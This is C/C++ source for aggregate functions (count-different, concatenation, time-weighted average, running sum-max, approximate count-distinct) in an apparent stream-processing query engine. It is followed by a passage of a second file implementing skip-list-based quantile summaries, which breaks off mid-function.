void LAST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
void LAST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
scratch->length = val->length;
scratch->offset = val->offset;
scratch->reserved = SHALLOW_COPY;
}
void LAST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
*res = *scratch;
}
void LAST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) { }
////////////////////////////////////////////////////////////
// count different (# of times the value is different than the previous)
struct count_diff_scratch{
gs_uint32_t count;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} r;
};
////////// HFTA only
// uint32
void count_diff_HFTA_AGGR_INIT_(gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
scratch->count = 0;
scratch->r.ul = 0;
}
void count_diff_HFTA_AGGR_REINIT_(gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
scratch->count = 0;
}
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val){
count_diff_scratch *scratch = (count_diff_scratch *)s;
if(scratch->count==0 || scratch->r.ui != val)
scratch->count++;
scratch->r.ui = val;
}
void count_diff_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
*res = scratch->count;
}
void count_diff_HFTA_AGGR_DESTROY_(gs_sp_t s){ }
// int32
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val){
count_diff_scratch *scratch = (count_diff_scratch *)s;
if(scratch->count==0 || scratch->r.i != val)
scratch->count++;
scratch->r.i = val;
}
// uint64
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val){
count_diff_scratch *scratch = (count_diff_scratch *)s;
if(scratch->count==0 || scratch->r.ul != val)
scratch->count++;
scratch->r.ul = val;
}
// int64
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val){
count_diff_scratch *scratch = (count_diff_scratch *)s;
if(scratch->count==0 || scratch->r.l != val)
scratch->count++;
scratch->r.l = val;
}
// vstring
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring* val){
count_diff_scratch *scratch = (count_diff_scratch *)s;
gs_uint64_t hashval = hfta_vstr_long_hashfunc(val);
if(scratch->count==0 || scratch->r.l != hashval)
scratch->count++;
scratch->r.l = hashval;
}
////////// HFTA / LFTA split
struct lfta_count_diff_scratch{
gs_uint32_t count;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} first;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} last;
};
void count_diff_hfta_HFTA_AGGR_INIT_(gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
scratch->count = 0;
scratch->r.ul = 0;
}
void count_diff_hfta_HFTA_AGGR_REINIT_(gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
scratch->count = 0;
scratch->r.ul = 0;
}
void count_diff_hfta_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *v){
lfta_count_diff_scratch *val = (lfta_count_diff_scratch *)v;
count_diff_scratch *scratch = (count_diff_scratch *)(v->offset);
scratch->count += val->count - 1;
if(scratch->r.l != val->first.l)
scratch->count++;
scratch->r.l = val->last.l;
}
void count_diff_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s){
count_diff_scratch *scratch = (count_diff_scratch *)s;
*res = (scratch->count)+1;
}
void count_diff_hfta_HFTA_AGGR_DESTROY_(gs_sp_t scratch){ }
/////////////////////////////////////////////////////////
// running_array_aggr aggregate
void running_array_aggr_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
scratch->offset = (gs_p_t)NULL;
scratch->length = 0;
}
void running_array_aggr_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
void running_array_aggr_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
char buffer[100];
gs_uint32_t* ints = (gs_uint32_t*)val->offset;
switch (val->length / sizeof (gs_uint32_t)) {
case 4:
sprintf(buffer, "%u,%u,%u,%u", ints[0], ints[1], ints[2], ints[3]);
break;
case 3:
sprintf(buffer, "%u,%u,%u", ints[0], ints[1], ints[2]);
break;
case 2:
sprintf(buffer, "%u,%u", ints[0], ints[1]);
break;
case 1:
sprintf(buffer, "%u", ints[0]);
break;
case 0:
return;
}
int buf_len = strlen(buffer);
// append the content of buffer to scratch
if (!scratch->offset) {
Vstring_Constructor(scratch, buffer);
} else {
scratch->offset = (gs_p_t)realloc((void*)scratch->offset, scratch->length + buf_len + 1);
*((char*)scratch->offset + scratch->length) = ',';
memcpy((void*)(scratch->offset + scratch->length + 1), (void*)buffer, buf_len);
scratch->length += buf_len + 1;
scratch->reserved = INTERNAL;
}
}
void running_array_aggr_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
*res = *scratch;
res->reserved = SHALLOW_COPY;
}
void running_array_aggr_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) {
hfta_vstr_destroy(scratch);
}
////////////////////////////////////////////
// Aggregate strings by catenation
struct CAT_aggr_scratch{
std::string val;
int x;
};
struct CAT_aggr_scratch_ptr{
CAT_aggr_scratch *ptr;
};
void CAT_aggr_HFTA_AGGR_INIT_(gs_sp_t s){
CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
CAT_aggr_scratch *v = new CAT_aggr_scratch();
v->x = 101;
p->ptr = v;
}
void CAT_aggr_HFTA_AGGR_REINIT_(gs_sp_t s){
CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
CAT_aggr_scratch *v = p->ptr;
v->val="";
}
void CAT_aggr_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *sep, vstring *str){
//char buf1[MAXTUPLESZ-20], buf2[MAXTUPLESZ-20];
//int i;
//for(i=0;i<sep->length;++i) buf1[i] = *(((char *)sep->offset)+i);
//buf1[i]='\0';
//for(i=0;i<str->length;++i) buf2[i] = *(((char *)str->offset)+i);
//buf2[i]='\0';
CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
CAT_aggr_scratch *v = p->ptr;
if(v->val.size()>0)
v->val.append((char *)(sep->offset), sep->length);
v->val.append((char *)(str->offset), str->length);
//printf("sep=%s, str=%s, val=%s\n",buf1,buf2,v->val.c_str());
}
void CAT_aggr_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s){
CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
CAT_aggr_scratch *v = p->ptr;
//printf("output val=%s\n",v->val.c_str());
res->offset = (gs_p_t)malloc(v->val.size());
res->length = v->val.size();
if(res->length>MAXTUPLESZ-20)
res->length=MAXTUPLESZ-20;
// v->val.copy((char *)(res->offset), 0, res->length);
const char *dat = v->val.c_str();
memcpy((char *)(res->offset), dat, res->length);
// for(int i=0;i<res->length;++i)
// *(((char *)res->offset)+i) = dat[i];
res->reserved = INTERNAL;
}
void CAT_aggr_HFTA_AGGR_DESTROY_(gs_sp_t s){
CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
CAT_aggr_scratch *v = p->ptr;
delete v;
}
///////////////////////////////////////////////////////////////
// time_avg((sample, ts, window_size)
// Compute time-weighted average sum(sample*duration)/window_size
// duration is difference between current and next ts.
// The idea is to compute a sum over a step function.
//
struct time_avg_udaf_str{
gs_float_t sum;
gs_float_t last_val;
gs_uint64_t last_ts;
gs_uint64_t window;
gs_uint64_t first_ts;
gs_uint8_t event_occurred;
};
void time_avg_HFTA_AGGR_INIT_(gs_sp_t s){
time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
scratch->sum = 0.0;
scratch->last_val = 0.0;
scratch->last_ts = 0;
scratch->first_ts = 0;
scratch->event_occurred = 0;
}
void time_avg_HFTA_AGGR_DESTROY_(gs_sp_t s){
}
void time_avg_HFTA_AGGR_REINIT_(gs_sp_t s){
time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
scratch->event_occurred = 0;
scratch->sum = 0;
//printf("time_avg_reinit: occurred=%d, last_val=%lf, sum=%lf, first_ts=%lld, last_ts=%lld\n",scratch->event_occurred, scratch->last_val, scratch->sum, scratch->first_ts, scratch->last_ts);
}
void time_avg_HFTA_AGGR_OUTPUT_(gs_float_t *result, gs_sp_t s){
time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
if(scratch->event_occurred==0){
*result = scratch->last_val;
//printf("\ttime_avg outpt1 sum=%lf, last_val=%lf, result=%lf\n", scratch->sum, scratch->last_val, *result);
return;
}
gs_int64_t end_time = scratch->window * (scratch->last_ts/scratch->window + 1);
scratch->sum += (end_time - scratch->last_ts) * (gs_float_t)(scratch->last_val);
gs_int64_t start_time = end_time - scratch->window;
if(scratch->first_ts > start_time){
*result = scratch->sum / (end_time - scratch->first_ts);
//printf("\ttime_avg outpt2 sum=%lf, start_time=%lld, end_time=%lld, first_ts=%lld, last_ts=%lld,result=%lf\n", scratch->sum, start_time, end_time, scratch->first_ts, scratch->last_ts, *result);
}else{
*result = scratch->sum / (end_time - start_time);
//printf("\ttime_avg outpt3 sum=%lf, start_time=%lld, end_time=%lld, first_ts=%lld, last_ts=%lld,result=%lf\n", scratch->sum, start_time, end_time, scratch->first_ts, scratch->last_ts, *result);
}
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_float_t val, gs_int64_t ts, gs_int64_t window){
time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
scratch->window = window;
if(scratch->first_ts==0){
scratch->first_ts = ts;
}else{
if(scratch->event_occurred){
scratch->sum += (ts - scratch->last_ts) * scratch->last_val;
}else{
gs_int64_t start_time = scratch->window * (scratch->last_ts/scratch->window);
scratch->sum += (ts - start_time) * scratch->last_val;
}
}
//printf("time_avg_upd: val=%lf, occurred=%d, last_val=%lf, sum=%lf, ts=%lld, first_ts=%lld, last_ts=%lld\n",val, scratch->event_occurred, scratch->last_val, scratch->sum, ts, scratch->first_ts, scratch->last_ts);
scratch->last_val = val;
scratch->last_ts = ts;
scratch->event_occurred = 1;
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val, gs_int64_t ts, gs_int64_t window){
time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val, gs_int64_t ts, gs_int64_t window){
time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val, gs_int64_t ts, gs_int64_t window){
time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val, gs_int64_t ts, gs_int64_t window){
time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
// ------------------------------------------------------------
// running_sum_max : get the running sum of an int,
// be able to report this sum and also its max value
// during the time window
struct run_sum_max_udaf_str{
gs_int64_t sum;
gs_int64_t max;
};
void run_sum_max_HFTA_AGGR_INIT_(gs_sp_t s){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->sum = 0;
scratch->max = 0;
}
void run_sum_max_HFTA_AGGR_REINIT_(gs_sp_t s){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->max = scratch->sum;
}
void run_sum_max_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
r->length = sizeof(run_sum_max_udaf_str);
r->offset = (gs_p_t)(b);
r->reserved = SHALLOW_COPY;
}
void run_sum_max_HFTA_AGGR_DESTROY_(gs_sp_t b){
return;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t v){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->sum+=v;
if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t v){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->sum+=v;
if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t v){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->sum+=v;
if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t v){
run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
scratch->sum+=v;
if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
// the extraction functions
gs_int64_t extr_running_sum(vstring *v){
if(v->length != sizeof(run_sum_max_udaf_str)) return 0;
run_sum_max_udaf_str *vs = (run_sum_max_udaf_str *)(v->offset);
return vs->sum;
}
gs_int64_t extr_running_sum_max(vstring *v){
if(v->length != sizeof(run_sum_max_udaf_str)) return 0;
run_sum_max_udaf_str *vs = (run_sum_max_udaf_str *)(v->offset);
return vs->max;
}
// ---------------------------------------------
// aggr_diff : from a sequence of strings, collect
// the ones which are different than the previous.
// this includes the prior time period.
// the idea is to see the sequence of handovers
struct CAT_aggr_diff_scratch{
std::string val;
std::string prev_s;
// gs_int64_t prev_ts; // for now, just catenate strings
};
struct CAT_aggr_diff_scratch_ptr{
CAT_aggr_diff_scratch *ptr;
};
void CAT_aggr_diff_HFTA_AGGR_INIT_(gs_sp_t s){
CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
CAT_aggr_diff_scratch *v = new CAT_aggr_diff_scratch();
v->prev_s = "";
v->val = "";
p->ptr = v;
}
void CAT_aggr_diff_HFTA_AGGR_REINIT_(gs_sp_t s){
CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
CAT_aggr_diff_scratch *v = p->ptr;
v->val=v->prev_s;
}
void CAT_aggr_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *str){
char str_buf[MAXTUPLESZ-20];
int i;
for(i=0;i<str->length;++i) str_buf[i] = *(((char *)str->offset)+i);
str_buf[i]='\0';
CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
CAT_aggr_diff_scratch *v = p->ptr;
if(str_buf != v->prev_s){
if(v->val.size()>0)
v->val += ':';
v->val += str_buf;
v->prev_s = str_buf;
}
}
void CAT_aggr_diff_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s){
CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
CAT_aggr_diff_scratch *v = p->ptr;
//printf("output val=%s\n",v->val.c_str());
res->offset = (gs_p_t)malloc(v->val.size());
res->length = v->val.size();
if(res->length>MAXTUPLESZ-20)
res->length=MAXTUPLESZ-20;
// v->val.copy((char *)(res->offset), 0, res->length);
const char *dat = v->val.c_str();
memcpy((char *)(res->offset), dat, res->length);
// for(int i=0;i<res->length;++i)
// *(((char *)res->offset)+i) = dat[i];
res->reserved = INTERNAL;
}
void CAT_aggr_diff_HFTA_AGGR_DESTROY_(gs_sp_t s){
CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
CAT_aggr_diff_scratch *v = p->ptr;
delete v;
}
// ---------------------------------------------
// Approximate count distinct.
// Rely on the minhashing approach.
// Currently HFTA-only
// Uses a 32-bit hash, tested up to 100,000,000 elements
// and it gave good results (within 7%)
#define COUNT_DISTINCT_NREPS 250
#define COUNT_DISTINCT_MAX_STRING_LEN 200 // number of 4-byte words
static Hash32bit2univID hids[COUNT_DISTINCT_NREPS];
static int approx_count_distinct_udaf_initialized = 0;
struct approx_count_distinct_udaf_str{
unsigned int mn[COUNT_DISTINCT_NREPS];
};
void approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)buf;
for(int i=0;i<COUNT_DISTINCT_NREPS;++i)
cd->mn[i]=4294967295;
if(approx_count_distinct_udaf_initialized==0){
for(int i=0;i<COUNT_DISTINCT_NREPS;++i)
hids[i] = InitStringHash32bit2univ(COUNT_DISTINCT_MAX_STRING_LEN);
approx_count_distinct_udaf_initialized=1;
}
}
void running_approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
approx_count_distinct_udaf_HFTA_AGGR_INIT_(buf);
}
void approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf){ }
void running_approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf){}
void approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){ }
void running_approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){ }
void approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)buf;
unsigned int buffer[sizeof(unsigned int)*COUNT_DISTINCT_MAX_STRING_LEN];
buffer[val->length/4] = 0;
memcpy((char *)buffer, (char *)val->offset, min(val->length, 800));
unsigned int len4 = val->length/4 + ((val->length&0x03)>0);
for(int i=0; i<COUNT_DISTINCT_NREPS; ++i){
unsigned int h = StringHash32bit2univ(buffer, len4, hids[i]);
if(h < cd->mn[i]) cd->mn[i] = h;
}
}
void running_approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val){
approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(buf, val);
}
void approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf){
res->offset = (gs_p_t)buf;
res->length = sizeof(approx_count_distinct_udaf_str);
res->reserved = SHALLOW_COPY;
}
void running_approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf){
approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(res, buf);
}
gs_float_t extr_approx_count_distinct(vstring *v){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)(v->offset);
gs_float_t avg = 0.0;
for(int i=0;i<COUNT_DISTINCT_NREPS;++i){
avg += cd->mn[i];
}
avg /= COUNT_DISTINCT_NREPS;
gs_float_t est = (4294967295.0 / avg) - 1;
return est;
}
<file_sep>#include <stdio.h>
#include <limits.h>
#include <math.h>
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
#include "udaf_common.h"
/* Full size
// NOTE: does not seem to be stable or correct with this setting
// compress only activates with this one, so compress is broken?
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 100
*/
/* half size
*/
// #define QUANT_LFTA1_SIZE 378
// #define QUANT_LFTA2_SIZE 93
// #define QUANT_LFTA3_SIZE 50
/* quarter size
#define QUANT_LFTA1_SIZE 202
#define QUANT_LFTA2_SIZE 49
#define QUANT_LFTA3_SIZE 25
*/
// #define QUANT_EPS 0.01
// #define SKIPDIR_SIZE 100
// #define SKIPDIR_HEIGHT_MAX 7
//#define max(a,b) ((a) > (b) ? (a) : (b))
#define COMPRESSED_XFER
/****************************************************************/
/* Data Structures */
/****************************************************************/
template <class T> struct tuple_t {
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_uint32_t next;
};
// For skip list
template <class T> struct skipnode_t {
T val;
gs_uint32_t next;
gs_uint32_t down;
};
template <class T> struct skipdir_t {
gs_uint32_t height; // height of tree
gs_uint32_t freeptr; // cursor space stack
gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX+1]; // ptrs to levels
skipnode_t<T> list[SKIPDIR_SIZE+1];
} ;
/****************************************************************/
// fstring(5+(QUANT_LFTA3_SIZE+1)*4 +
// (2+lg(QUANT_LFTA3_SIZE)+(QUANT_LFTA3_SIZE+1)*3)*4)
template <class T> struct quant_udaf_lfta3_struct_t {
gs_uint32_t nelts; // # stream elements
gs_uint32_t freeptr; // ptr to cursor stack
gs_uint32_t usedptr; // ptr to allocated memory
gs_uint32_t circptr; // circulating ptr used for compression
gs_uint32_t size;
tuple_t<T> t[QUANT_LFTA3_SIZE+1]; // samples + auxiliary info
skipdir_t<T> sd; // directory for searching tuples
} ;
/****************************************************************/
/* Skip List Functions */
/****************************************************************/
// Skip list cursor stack operations
template <class T> gs_uint32_t skipdir_alloc(skipdir_t<T> *sd)
{
gs_uint32_t ptr = sd->freeptr;
if (sd->freeptr != 0)
sd->freeptr = sd->list[ptr].next;
//printf("skipdir_alloc %d\n",ptr);
return ptr;
}
template <class T> void skipdir_free(skipdir_t<T> *sd, gs_uint32_t ptr)
{
sd->list[ptr].val = 0;
sd->list[ptr].down = 0;
sd->list[ptr].next = sd->freeptr;
sd->freeptr = ptr;
//printf("skipdir_free %d\n",ptr);
}
template <class T> void skipdir_create(skipdir_t<T> *sd)
{
gs_int32_t i;
sd->height = 0;
sd->freeptr = 1;
for (i=0; i < SKIPDIR_HEIGHT_MAX; i++)
sd->headptr[i] = 0;
for (i=1; i < SKIPDIR_SIZE; i++)
sd->list[i].next = i+1;
sd->list[SKIPDIR_SIZE].next = 0;
}
template <class T> void skipdir_destroy(skipdir_t<T> *sd)
{
sd->height = 0;
}
template <class T> void skipdir_search(skipdir_t<T> *sd, T val, gs_uint32_t *ptrstack)
{
gs_uint32_t ptr;
gs_int32_t l;
if (sd->height == 0) {
ptrstack[0] = ptrstack[1] = 0;
return;
}
// search nonleaf nodes
ptr = sd->headptr[sd->height-1];
for (l=sd->height-1; l >= 0; l--) {
if (ptr == 0) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else if (val <= sd->list[ptr].val) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else {
while ((sd->list[ptr].next != 0) &&
(sd->list[sd->list[ptr].next].val < val))
ptr = sd->list[ptr].next;
ptrstack[l+1] = ptr;
ptr = sd->list[ptr].down;
}
}
ptrstack[0] = ptr;
}
template <class T> void skipdir_insert(skipdir_t<T> *sd, gs_uint32_t *ptrstack,
gs_uint32_t leafptr, T val)
{
gs_uint32_t newptr, oldptr;
gs_int32_t l;
// if path already existed then point to new duplicate
if ((ptrstack[1] == 0) && (sd->headptr[0] != 0)
&& (sd->list[sd->headptr[0]].val == val)) {
sd->list[sd->headptr[0]].down = leafptr;
return;
}
if ((ptrstack[1] != 0) && (sd->list[ptrstack[1]].next != 0)
&& (sd->list[sd->list[ptrstack[1]].next].val == val)) {
sd->list[sd->list[ptrstack[1]].next].down = leafptr;
return;
}
for (l=0; l < SKIPDIR_HEIGHT_MAX; l++) {
if (random() % 2) break;
newptr = skipdir_alloc<T>(sd);
if (!newptr) break; // out of memory
sd->list[newptr].val = val;
//copy(&val, &list[newptr[l]].val);
// link new directory node to level below
if (l > 0)
sd->list[newptr].down = oldptr;
else
sd->list[newptr].down = leafptr;
// insert node into current level
if ((l >= sd->height) || (ptrstack[l+1] == 0)) {
sd->list[newptr].next = sd->headptr[l];
sd->headptr[l] = newptr;
}
else {
sd->list[newptr].next = sd->list[ptrstack[l+1]].next;
sd->list[ptrstack[l+1]].next = newptr;
}
oldptr = newptr;
}
if (l > sd->height) sd->height = l;
//fprintf(stderr,"new height = %u\n",sd->height);
}
template <class T> void skipdir_delete(skipdir_t<T> *sd, gs_uint32_t *ptrstack, T val)
{
gs_uint32_t delptr;
gs_int32_t l;
for (l=0; l < sd->height; l++) {
if (ptrstack[l+1] == 0) {
delptr = sd->headptr[l];
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->headptr[l] = sd->list[delptr].next;
skipdir_free<T>(sd, delptr);
}
else
break;
}
else {
delptr = sd->list[ptrstack[l+1]].next;
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->list[ptrstack[l+1]].next = sd->list[delptr].next;
skipdir_free<T>(sd, delptr);
}
else
break;
}
}
}
// For Debugging
template <class T> void skipdir_print(skipdir_t<T> *sd)
{
gs_uint32_t ptr;
gs_int32_t l;
for (l=sd->height-1; l >= 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[ptr].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
for (l=sd->height-1; l > 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[sd->list[ptr].down].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
}
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/* */
/* NIC performs O(log n) operations at each update. */
/****************************************************************/
/****************************************************************/
/* Helper functions */
/****************************************************************/
template <class T> gs_uint32_t quant_udaf_lfta3_cursor_alloc(quant_udaf_lfta3_struct_t<T> *s)
{
gs_uint32_t ptr = s->freeptr;
if (s->freeptr != 0) s->freeptr = s->t[ptr].next;
s->size++;
// printf("quant_udaf_lfta3_cursor_alloc %d freeptr %d\n",ptr, s->freeptr);
return ptr;
}
template <class T> void quant_udaf_lfta3_cursor_free(quant_udaf_lfta3_struct_t<T> *s, gs_uint32_t ptr)
{
s->t[ptr].next = s->freeptr;
s->freeptr = ptr;
s->size--;
//printf("quant_udaf_lfta3_cursor_free %d\n",ptr);
}
template <class T> void quant_lfta3_print(quant_udaf_lfta3_struct_t<T> *s)
{
tuple_t<T> *t=s->t;
gs_uint32_t ptr = s->usedptr;
if (ptr == 0) {
fprintf(stderr,"<empty>\n");
return;
}
//skipdir_print(&s->sd);
for (; ptr != 0; ptr=t[ptr].next) {
fprintf(stderr,"(%u, %u, %u) ",t[ptr].val,t[ptr].gap,t[ptr].del);
}
fprintf(stderr,"\n");
}
template <class T> void quant_lfta3_compress(quant_udaf_lfta3_struct_t<T> *s)
{
tuple_t<T> *t = s->t;
gs_uint32_t delptr;
gs_uint32_t threshold;
gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("1) s->circptr = %d\n",s->circptr);
//if(t[s->circptr].next < 0 || t[s->circptr].next >= QUANT_LFTA3_SIZE)
// printf("t[s->circptr].next = %d\n",t[s->circptr].next);
if ((s->circptr == 0) || (t[s->circptr].next == 0)
|| (t[t[s->circptr].next].next == 0))
s->circptr = s->usedptr;
//if ((s->size % 10) != 0) return;
if (s->nelts > 2) {
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("2) s->circptr = %d\n",s->circptr);
delptr = t[s->circptr].next;
//if(delptr < 0 || delptr >= QUANT_LFTA3_SIZE)
// printf("delptr = %d\n",delptr);
//if(t[delptr].next < 0 || t[delptr].next >= QUANT_LFTA3_SIZE)
// printf("t[delptr].next = %d\n",t[delptr].next);
if (t[delptr].gap+t[t[delptr].next].gap+t[t[delptr].next].del < threshold) {
// delete from directory
if (t[s->circptr].val != t[delptr].val) {
// leftmost duplicate (if multiplicity)
skipdir_search<T>(&(s->sd), t[delptr].val, ptrstack);
if (t[delptr].val == t[t[delptr].next].val) {
//if(s->sd.headptr[0] < 0 || s->sd.headptr[0] >= QUANT_LFTA3_SIZE)
// printf("s->sd.headptr[0] = %d\n",s->sd.headptr[0]);
// duplicates case
if ((ptrstack[1] == 0)
&& (s->sd.headptr[0] != 0)
&& (s->sd.list[s->sd.headptr[0]].val == t[delptr].val))
s->sd.list[s->sd.headptr[0]].down = t[delptr].next;
else if ((ptrstack[1] != 0)
&& (s->sd.list[ptrstack[1]].next != 0)
&& (s->sd.list[s->sd.list[ptrstack[1]].next].val == t[delptr].val))
s->sd.list[s->sd.list[ptrstack[1]].next].down = t[delptr].next;
}
else {
// non-duplicates case
skipdir_delete<T>(&(s->sd), ptrstack, t[delptr].val);
}
}
// delete from list
//fprintf(stderr,"DELETED %u\n", t[delptr].val);
t[s->circptr].next = t[delptr].next;
quant_udaf_lfta3_cursor_free<T>(s, delptr);
}
else {
s->circptr = t[s->circptr].next;
}
}
}
/****************************************************************/
/* LFTA3 functions */
/****************************************************************/
template <class T> void quant_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b) {
gs_uint32_t i;
//printf("LFTA, sizeof(quant_udaf_lfta3_struct_t) is %lu\n",sizeof(quant_udaf_lfta3_struct_t<T>));
quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
s->nelts = 0;
s->usedptr = 0; // NULL ptr
s->circptr = 0;
// initialize cursor stack
s->freeptr = 1;
s->size = 0;
for (i=1; i < QUANT_LFTA3_SIZE; i++)
s->t[i].next = i+1;
s->t[QUANT_LFTA3_SIZE].next = 0;
skipdir_create<T>(&(s->sd));
//printf("sizeof(quant_udaf_lfta3_struct_t)=%lu\n",sizeof(quant_udaf_lfta3_struct_t<T>));
}
template <class T> void quant_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, T v)
{
quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
tuple_t<T> *t = s->t;
gs_uint32_t ptr = s->usedptr;
gs_uint32_t newptr, delptr;
gs_uint32_t obj; // objective function
gs_uint32_t threshold;
gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
gs_uint32_t debugptr;
//printf("AGGR_UPDATE start\n");
s->nelts++;
//fprintf(stderr,"nelts = %u\n",s->nelts);
// left boundary case
if ((ptr == 0) || (v < t[ptr].val)) {
if (t[ptr].val == v) {
